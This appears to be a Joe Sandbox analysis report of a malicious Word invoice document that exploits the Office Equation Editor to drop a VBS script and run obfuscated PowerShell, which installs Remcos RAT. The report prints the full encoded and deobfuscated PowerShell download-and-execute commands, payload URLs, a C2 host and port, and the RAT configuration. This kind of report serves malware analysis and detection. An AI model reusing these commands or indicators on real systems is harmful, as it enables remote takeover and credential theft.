Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
factura proforma .docx.doc

Overview

General Information

Sample name:factura proforma .docx.doc
Analysis ID:1522666
MD5:cde646bbf76aa0cb430f71ec2408b4bd
SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
Tags:docuser-peeterzerblat
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3364 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3796 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3868 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 4032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 2736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2260 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cxunlhrzeibfklqhoxlbtidgm" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3288 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPF38I", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\notpad0\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1d84:$obj2: \objdata
    • 0x1d9a:$obj3: \objupdate
    • 0x1d5f:$obj6: \objlink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4471D5D4.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x1d84:$obj2: \objdata
    • 0x1d9a:$obj3: \objupdate
    • 0x1d5f:$obj6: \objlink
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 23 entries
            SourceRuleDescriptionAuthorStrings
            14.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              14.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                14.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  14.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  14.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 18 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 91.134.96.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3796, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3796, TargetFilename: C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3796, Protocol: tcp, SourceIp: 91.134.96.177, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 